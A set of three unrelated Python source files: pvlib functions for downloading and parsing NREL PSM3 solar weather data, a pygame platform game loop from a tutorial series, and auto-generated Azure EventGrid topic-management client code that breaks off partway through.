NSRDB_API_BASE = "https://developer.nrel.gov"
PSM_URL = NSRDB_API_BASE + "/api/nsrdb/v2/solar/psm3-download.csv"
TMY_URL = NSRDB_API_BASE + "/api/nsrdb/v2/solar/psm3-tmy-download.csv"
PSM5MIN_URL = NSRDB_API_BASE + "/api/nsrdb/v2/solar/psm3-5min-download.csv"
# 'relative_humidity', 'total_precipitable_water' are not available
ATTRIBUTES = (
'air_temperature', 'dew_point', 'dhi', 'dni', 'ghi', 'surface_albedo',
'surface_pressure', 'wind_direction', 'wind_speed')
PVLIB_PYTHON = 'pvlib python'
def get_psm3(latitude, longitude, api_key, email, names='tmy', interval=60,
attributes=ATTRIBUTES, leap_day=False, full_name=PVLIB_PYTHON,
affiliation=PVLIB_PYTHON, timeout=30):
"""
Retrieve NSRDB PSM3 timeseries weather data from the PSM3 API. The NSRDB
is described in [1]_ and the PSM3 API is described in [2]_, [3]_, and [4]_.
.. versionchanged:: 0.9.0
The function now returns a tuple where the first element is a dataframe
and the second element is a dictionary containing metadata. Previous
versions of this function had the return values switched.
Parameters
----------
latitude : float or int
in decimal degrees, between -90 and 90, north is positive
longitude : float or int
in decimal degrees, between -180 and 180, east is positive
api_key : str
NREL Developer Network API key
email : str
NREL API uses this to automatically communicate messages back
to the user only if necessary
names : str, default 'tmy'
PSM3 API parameter specifing year or TMY variant to download, see notes
below for options
interval : int, {60, 5, 15, 30}
interval size in minutes, must be 5, 15, 30 or 60. Only used for
single-year requests (i.e., it is ignored for tmy/tgy/tdy requests).
attributes : list of str, optional
meteorological fields to fetch. If not specified, defaults to
``pvlib.iotools.psm3.ATTRIBUTES``. See references [2]_, [3]_, and [4]_
for lists of available fields.
leap_day : boolean, default False
include leap day in the results. Only used for single-year requests
(i.e., it is ignored for tmy/tgy/tdy requests).
full_name : str, default 'pvlib python'
optional
affiliation : str, default 'pvlib python'
optional
timeout : int, default 30
time in seconds to wait for server response before timeout
Returns
-------
data : pandas.DataFrame
timeseries data from NREL PSM3
metadata : dict
metadata from NREL PSM3 about the record, see
:func:`pvlib.iotools.parse_psm3` for fields
Raises
------
requests.HTTPError
if the request response status is not ok, then the ``'errors'`` field
from the JSON response or any error message in the content will be
raised as an exception, for example if the `api_key` was rejected or if
the coordinates were not found in the NSRDB
Notes
-----
The required NREL developer key, `api_key`, is available for free by
registering at the `NREL Developer Network <https://developer.nrel.gov/>`_.
.. warning:: The "DEMO_KEY" `api_key` is severely rate limited and may
result in rejected requests.
The PSM3 API `names` parameter must be a single value from one of these
lists:
+-----------+-------------------------------------------------------------+
| Category | Allowed values |
+===========+=============================================================+
| Year | 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, |
| | 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017, |
| | 2018, 2019 |
+-----------+-------------------------------------------------------------+
| TMY | tmy, tmy-2016, tmy-2017, tdy-2017, tgy-2017, |
| | tmy-2018, tdy-2018, tgy-2018, tmy-2019, tdy-2019, tgy-2019 |
+-----------+-------------------------------------------------------------+
.. warning:: PSM3 is limited to data found in the NSRDB, please consult the
references below for locations with available data. Additionally,
querying data with < 30-minute resolution uses a different API endpoint
with fewer available fields (see [4]_).
See Also
--------
pvlib.iotools.read_psm3, pvlib.iotools.parse_psm3
References
----------
.. [1] `NREL National Solar Radiation Database (NSRDB)
<https://nsrdb.nrel.gov/>`_
.. [2] `Physical Solar Model (PSM) v3
<https://developer.nrel.gov/docs/solar/nsrdb/psm3-download/>`_
.. [3] `Physical Solar Model (PSM) v3 TMY
<https://developer.nrel.gov/docs/solar/nsrdb/psm3-tmy-download/>`_
.. [4] `Physical Solar Model (PSM) v3 - Five Minute Temporal Resolution
<https://developer.nrel.gov/docs/solar/nsrdb/psm3-5min-download/>`_
"""
# The well know text (WKT) representation of geometry notation is strict.
# A POINT object is a string with longitude first, then the latitude, with
# four decimals each, and exactly one space between them.
longitude = ('%9.4f' % longitude).strip()
latitude = ('%8.4f' % latitude).strip()
# TODO: make format_WKT(object_type, *args) in tools.py
# convert to string to accomodate integer years being passed in
names = str(names)
# required query-string parameters for request to PSM3 API
params = {
'api_key': api_key,
'full_name': full_name,
'email': email,
'affiliation': affiliation,
'reason': PVLIB_PYTHON,
'mailing_list': 'false',
'wkt': 'POINT(%s %s)' % (longitude, latitude),
'names': names,
'attributes': ','.join(attributes),
'leap_day': str(leap_day).lower(),
'utc': 'false',
'interval': interval
}
# request CSV download from NREL PSM3
if any(prefix in names for prefix in ('tmy', 'tgy', 'tdy')):
URL = TMY_URL
elif interval in (5, 15):
URL = PSM5MIN_URL
else:
URL = PSM_URL
response = requests.get(URL, params=params, timeout=timeout)
if not response.ok:
# if the API key is rejected, then the response status will be 403
# Forbidden, and then the error is in the content and there is no JSON
try:
errors = response.json()['errors']
except JSONDecodeError:
errors = response.content.decode('utf-8')
raise requests.HTTPError(errors, response=response)
# the CSV is in the response content as a UTF-8 bytestring
# to use pandas we need to create a file buffer from the response
fbuf = io.StringIO(response.content.decode('utf-8'))
return parse_psm3(fbuf)
def parse_psm3(fbuf):
"""
Parse an NSRDB PSM3 weather file (formatted as SAM CSV). The NSRDB
is described in [1]_ and the SAM CSV format is described in [2]_.
.. versionchanged:: 0.9.0
The function now returns a tuple where the first element is a dataframe
and the second element is a dictionary containing metadata. Previous
versions of this function had the return values switched.
Parameters
----------
fbuf: file-like object
File-like object containing data to read.
Returns
-------
data : pandas.DataFrame
timeseries data from NREL PSM3
metadata : dict
metadata from NREL PSM3 about the record, see notes for fields
Notes
-----
The return is a tuple with two items. The first item is a dataframe with
the PSM3 timeseries data.
The second item is a dictionary with metadata from NREL PSM3 about the
record containing the following fields:
* Source
* Location ID
* City
* State
* Country
* Latitude
* Longitude
* Time Zone
* Elevation
* Local Time Zone
* Clearsky DHI Units
* Clearsky DNI Units
* Clearsky GHI Units
* Dew Point Units
* DHI Units
* DNI Units
* GHI Units
* Solar Zenith Angle Units
* Temperature Units
* Pressure Units
* Relative Humidity Units
* Precipitable Water Units
* Wind Direction Units
* Wind Speed Units
* Cloud Type -15
* Cloud Type 0
* Cloud Type 1
* Cloud Type 2
* Cloud Type 3
* Cloud Type 4
* Cloud Type 5
* Cloud Type 6
* Cloud Type 7
* Cloud Type 8
* Cloud Type 9
* Cloud Type 10
* Cloud Type 11
* Cloud Type 12
* Fill Flag 0
* Fill Flag 1
* Fill Flag 2
* Fill Flag 3
* Fill Flag 4
* Fill Flag 5
* Surface Albedo Units
* Version
Examples
--------
>>> # Read a local PSM3 file:
>>> with open(filename, 'r') as f: # doctest: +SKIP
... df, metadata = iotools.parse_psm3(f) # doctest: +SKIP
See Also
--------
pvlib.iotools.read_psm3, pvlib.iotools.get_psm3
References
----------
.. [1] `NREL National Solar Radiation Database (NSRDB)
<https://nsrdb.nrel.gov/>`_
.. [2] `Standard Time Series Data File Format
<https://rredc.nrel.gov/solar/old_data/nsrdb/2005-2012/wfcsv.pdf>`_
"""
# The first 2 lines of the response are headers with metadata
metadata_fields = fbuf.readline().split(',')
metadata_fields[-1] = metadata_fields[-1].strip() # strip trailing newline
metadata_values = fbuf.readline().split(',')
metadata_values[-1] = metadata_values[-1].strip() # strip trailing newline
metadata = dict(zip(metadata_fields, metadata_values))
# the response is all strings, so set some metadata types to numbers
metadata['Local Time Zone'] = int(metadata['Local Time Zone'])
metadata['Time Zone'] = int(metadata['Time Zone'])
metadata['Latitude'] = float(metadata['Latitude'])
metadata['Longitude'] = float(metadata['Longitude'])
metadata['Elevation'] = int(metadata['Elevation'])
# get the column names so we can set the dtypes
columns = fbuf.readline().split(',')
columns[-1] = columns[-1].strip() # strip trailing newline
# Since the header has so many columns, excel saves blank cols in the
# data below the header lines.
columns = [col for col in columns if col != '']
dtypes = dict.fromkeys(columns, float) # all floats except datevec
dtypes.update(Year=int, Month=int, Day=int, Hour=int, Minute=int)
dtypes['Cloud Type'] = int
dtypes['Fill Flag'] = int
data = pd.read_csv(
fbuf, header=None, names=columns, usecols=columns, dtype=dtypes,
delimiter=',', lineterminator='\n') # skip carriage returns \r
# the response 1st 5 columns are a date vector, convert to datetime
dtidx = pd.to_datetime(
data[['Year', 'Month', 'Day', 'Hour', 'Minute']])
# in USA all timezones are integers
tz = 'Etc/GMT%+d' % -metadata['Time Zone']
data.index = pd.DatetimeIndex(dtidx).tz_localize(tz)
return data, metadata
def read_psm3(filename):
"""
Read an NSRDB PSM3 weather file (formatted as SAM CSV). The NSRDB
is described in [1]_ and the SAM CSV format is described in [2]_.
.. versionchanged:: 0.9.0
The function now returns a tuple where the first element is a dataframe
and the second element is a dictionary containing metadata. Previous
versions of this function had the return values switched.
Parameters
----------
filename: str
Filename of a file containing data to read.
Returns
-------
data : pandas.DataFrame
timeseries data from NREL PSM3
metadata : dict
metadata from NREL PSM3 about the record, see
:func:`pvlib.iotools.parse_psm3` for fields
See Also
--------
pvlib.iotools.parse_psm3, pvlib.iotools.get_psm3
References
----------
.. [1] `NREL National Solar Radiation Database (NSRDB)
<https://nsrdb.nrel.gov/>`_
.. [2] `Standard Time Series Data File Format
<https://rredc.nrel.gov/solar/old_data/nsrdb/2005-2012/wfcsv.pdf>`_
"""
with open(str(filename), 'r') as fbuf:
content = parse_psm3(fbuf)
return content
|
|
# KidsCanCode - Game Development with Pygame video series
# Jumpy! (a platform game) - Part 17
# Video link: https://youtu.be/Dspz3kaTKUg
# Using mask collisions
# Art from Kenney.nl
# Happy Tune by http://opengameart.org/users/syncopika
# Yippee by http://opengameart.org/users/snabisch
import pygame as pg
import random
from settings import *
from sprites import *
from os import path
class Game:
def __init__(self):
# initialize game window, etc
pg.init()
pg.mixer.init()
self.screen = pg.display.set_mode((WIDTH, HEIGHT))
pg.display.set_caption(TITLE)
self.clock = pg.time.Clock()
self.running = True
self.font_name = pg.font.match_font(FONT_NAME)
self.load_data()
def load_data(self):
# load high score
self.dir = path.dirname(__file__)
with open(path.join(self.dir, HS_FILE), 'r') as f:
try:
self.highscore = int(f.read())
except:
self.highscore = 0
# load spritesheet image
img_dir = path.join(self.dir, 'img')
self.spritesheet = Spritesheet(path.join(img_dir, SPRITESHEET))
# load sounds
self.snd_dir = path.join(self.dir, 'snd')
self.jump_sound = pg.mixer.Sound(path.join(self.snd_dir, 'Jump33.wav'))
self.boost_sound = pg.mixer.Sound(path.join(self.snd_dir, 'Boost16.wav'))
def new(self):
# start a new game
self.score = 0
self.all_sprites = pg.sprite.LayeredUpdates()
self.platforms = pg.sprite.Group()
self.powerups = pg.sprite.Group()
self.mobs = pg.sprite.Group()
self.player = Player(self)
for plat in PLATFORM_LIST:
Platform(self, *plat)
self.mob_timer = 0
pg.mixer.music.load(path.join(self.snd_dir, 'Happy Tune.ogg'))
self.run()
def run(self):
# Game Loop
pg.mixer.music.play(loops=-1)
self.playing = True
while self.playing:
self.clock.tick(FPS)
self.events()
self.update()
self.draw()
pg.mixer.music.fadeout(500)
def update(self):
# Game Loop - Update
self.all_sprites.update()
# spawn a mob?
now = pg.time.get_ticks()
if now - self.mob_timer > 5000 + random.choice([-1000, -500, 0, 500, 1000]):
self.mob_timer = now
Mob(self)
# hit mobs?
mob_hits = pg.sprite.spritecollide(self.player, self.mobs, False, pg.sprite.collide_mask)
if mob_hits:
self.playing = False
# check if player hits a platform - only if falling
if self.player.vel.y > 0:
hits = pg.sprite.spritecollide(self.player, self.platforms, False)
if hits:
lowest = hits[0]
for hit in hits:
if hit.rect.bottom > lowest.rect.bottom:
lowest = hit
if self.player.pos.x < lowest.rect.right + 10 and \
self.player.pos.x > lowest.rect.left - 10:
if self.player.pos.y < lowest.rect.centery:
self.player.pos.y = lowest.rect.top
self.player.vel.y = 0
self.player.jumping = False
# if player reaches top 1/4 of screen
if self.player.rect.top <= HEIGHT / 4:
self.player.pos.y += max(abs(self.player.vel.y), 2)
for mob in self.mobs:
mob.rect.y += max(abs(self.player.vel.y), 2)
for plat in self.platforms:
plat.rect.y += max(abs(self.player.vel.y), 2)
if plat.rect.top >= HEIGHT:
plat.kill()
self.score += 10
# if player hits powerup
pow_hits = pg.sprite.spritecollide(self.player, self.powerups, True)
for pow in pow_hits:
if pow.type == 'boost':
self.boost_sound.play()
self.player.vel.y = -BOOST_POWER
self.player.jumping = False
# Die!
if self.player.rect.bottom > HEIGHT:
for sprite in self.all_sprites:
sprite.rect.y -= max(self.player.vel.y, 10)
if sprite.rect.bottom < 0:
sprite.kill()
if len(self.platforms) == 0:
self.playing = False
# spawn new platforms to keep same average number
while len(self.platforms) < 6:
width = random.randrange(50, 100)
Platform(self, random.randrange(0, WIDTH - width),
random.randrange(-75, -30))
def events(self):
# Game Loop - events
for event in pg.event.get():
# check for closing window
if event.type == pg.QUIT:
if self.playing:
self.playing = False
self.running = False
if event.type == pg.KEYDOWN:
if event.key == pg.K_SPACE:
self.player.jump()
if event.type == pg.KEYUP:
if event.key == pg.K_SPACE:
self.player.jump_cut()
def draw(self):
# Game Loop - draw
self.screen.fill(BGCOLOR)
self.all_sprites.draw(self.screen)
self.draw_text(str(self.score), 22, WHITE, WIDTH / 2, 15)
# *after* drawing everything, flip the display
pg.display.flip()
def show_start_screen(self):
# game splash/start screen
pg.mixer.music.load(path.join(self.snd_dir, 'Yippee.ogg'))
pg.mixer.music.play(loops=-1)
self.screen.fill(BGCOLOR)
self.draw_text(TITLE, 48, WHITE, WIDTH / 2, HEIGHT / 4)
self.draw_text("Arrows to move, Space to jump", 22, WHITE, WIDTH / 2, HEIGHT / 2)
self.draw_text("Press a key to play", 22, WHITE, WIDTH / 2, HEIGHT * 3 / 4)
self.draw_text("High Score: " + str(self.highscore), 22, WHITE, WIDTH / 2, 15)
pg.display.flip()
self.wait_for_key()
pg.mixer.music.fadeout(500)
def show_go_screen(self):
# game over/continue
if not self.running:
return
pg.mixer.music.load(path.join(self.snd_dir, 'Yippee.ogg'))
pg.mixer.music.play(loops=-1)
self.screen.fill(BGCOLOR)
self.draw_text("GAME OVER", 48, WHITE, WIDTH / 2, HEIGHT / 4)
self.draw_text("Score: " + str(self.score), 22, WHITE, WIDTH / 2, HEIGHT / 2)
self.draw_text("Press a key to play again", 22, WHITE, WIDTH / 2, HEIGHT * 3 / 4)
if self.score > self.highscore:
self.highscore = self.score
self.draw_text("NEW HIGH SCORE!", 22, WHITE, WIDTH / 2, HEIGHT / 2 + 40)
with open(path.join(self.dir, HS_FILE), 'w') as f:
f.write(str(self.score))
else:
self.draw_text("High Score: " + str(self.highscore), 22, WHITE, WIDTH / 2, HEIGHT / 2 + 40)
pg.display.flip()
self.wait_for_key()
pg.mixer.music.fadeout(500)
def wait_for_key(self):
waiting = True
while waiting:
self.clock.tick(FPS)
for event in pg.event.get():
if event.type == pg.QUIT:
waiting = False
self.running = False
if event.type == pg.KEYUP:
waiting = False
def draw_text(self, text, size, color, x, y):
font = pg.font.Font(self.font_name, size)
text_surface = font.render(text, True, color)
text_rect = text_surface.get_rect()
text_rect.midtop = (x, y)
self.screen.blit(text_surface, text_rect)
g = Game()
g.show_start_screen()
while g.running:
g.new()
g.show_go_screen()
pg.quit()
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.polling import LROPoller, NoPolling, PollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.arm_polling import ARMPolling
from msrest import Serializer
from .. import models as _models
from .._vendor import _convert_request, _format_url_section
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar, Union
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
# fmt: off
def build_get_request(
subscription_id, # type: str
resource_group_name, # type: str
topic_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = "2021-12-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"topicName": _SERIALIZER.url("topic_name", topic_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_create_or_update_request_initial(
subscription_id, # type: str
resource_group_name, # type: str
topic_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
content_type = kwargs.pop('content_type', None) # type: Optional[str]
api_version = "2021-12-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"topicName": _SERIALIZER.url("topic_name", topic_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PUT",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_delete_request_initial(
subscription_id, # type: str
resource_group_name, # type: str
topic_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = "2021-12-01"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"topicName": _SERIALIZER.url("topic_name", topic_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
return HttpRequest(
method="DELETE",
url=url,
params=query_parameters,
**kwargs
)
def build_update_request_initial(
subscription_id, # type: str
resource_group_name, # type: str
topic_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
content_type = kwargs.pop('content_type', None) # type: Optional[str]
api_version = "2021-12-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"topicName": _SERIALIZER.url("topic_name", topic_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="PATCH",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_list_by_subscription_request(
subscription_id, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
filter = kwargs.pop('filter', None) # type: Optional[str]
top = kwargs.pop('top', None) # type: Optional[int]
api_version = "2021-12-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/providers/Microsoft.EventGrid/topics')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
if filter is not None:
query_parameters['$filter'] = _SERIALIZER.query("filter", filter, 'str')
if top is not None:
query_parameters['$top'] = _SERIALIZER.query("top", top, 'int')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_list_by_resource_group_request(
subscription_id, # type: str
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
filter = kwargs.pop('filter', None) # type: Optional[str]
top = kwargs.pop('top', None) # type: Optional[int]
api_version = "2021-12-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
if filter is not None:
query_parameters['$filter'] = _SERIALIZER.query("filter", filter, 'str')
if top is not None:
query_parameters['$top'] = _SERIALIZER.query("top", top, 'int')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_list_shared_access_keys_request(
subscription_id, # type: str
resource_group_name, # type: str
topic_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = "2021-12-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}/listKeys')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"topicName": _SERIALIZER.url("topic_name", topic_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_regenerate_key_request_initial(
subscription_id, # type: str
resource_group_name, # type: str
topic_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
content_type = kwargs.pop('content_type', None) # type: Optional[str]
api_version = "2021-12-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}/regenerateKey')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"topicName": _SERIALIZER.url("topic_name", topic_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
if content_type is not None:
header_parameters['Content-Type'] = _SERIALIZER.header("content_type", content_type, 'str')
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="POST",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
def build_list_event_types_request(
subscription_id, # type: str
resource_group_name, # type: str
provider_namespace, # type: str
resource_type_name, # type: str
resource_name, # type: str
**kwargs # type: Any
):
# type: (...) -> HttpRequest
api_version = "2021-12-01"
accept = "application/json"
# Construct URL
url = kwargs.pop("template_url", '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/{providerNamespace}/{resourceTypeName}/{resourceName}/providers/Microsoft.EventGrid/eventTypes')
path_format_arguments = {
"subscriptionId": _SERIALIZER.url("subscription_id", subscription_id, 'str'),
"resourceGroupName": _SERIALIZER.url("resource_group_name", resource_group_name, 'str'),
"providerNamespace": _SERIALIZER.url("provider_namespace", provider_namespace, 'str'),
"resourceTypeName": _SERIALIZER.url("resource_type_name", resource_type_name, 'str'),
"resourceName": _SERIALIZER.url("resource_name", resource_name, 'str'),
}
url = _format_url_section(url, **path_format_arguments)
# Construct parameters
query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=url,
params=query_parameters,
headers=header_parameters,
**kwargs
)
# fmt: on
class TopicsOperations(object):
"""TopicsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.eventgrid.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def get(
self,
resource_group_name, # type: str
topic_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.Topic"
"""Get a topic.
Get properties of a topic.
:param resource_group_name: The name of the resource group within the user's subscription.
:type resource_group_name: str
:param topic_name: Name of the topic.
:type topic_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Topic, or the result of cls(response)
:rtype: ~azure.mgmt.eventgrid.models.Topic
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Topic"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
topic_name=topic_name,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Topic', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}'} # type: ignore
def _create_or_update_initial(
self,
resource_group_name, # type: str
topic_name, # type: str
topic_info, # type: "_models.Topic"
**kwargs # type: Any
):
# type: (...) -> "_models.Topic"
cls = kwargs.pop('cls', None) # type: ClsType["_models.Topic"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(topic_info, 'Topic')
request = build_create_or_update_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
topic_name=topic_name,
content_type=content_type,
json=_json,
template_url=self._create_or_update_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Topic', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.EventGrid/topics/{topicName}'} # type: ignore
@distributed_trace
def begin_create_or_update(
self,
resource_group_name, # type: str
topic_name, # type: str
topic_info, # type: "_models.Topic"
**kwargs # type: Any
):
# type: (...) -> LROPoller["_models.Topic"]
"""Create a topic.
Asynchronously creates a new topic with the specified parameters.
:param resource_group_name: The name of the resource group within the user's subscription.
:type resource_group_name: str
:param topic_name: Name of the topic.
:type topic_name: str
:param topic_info: Topic information.
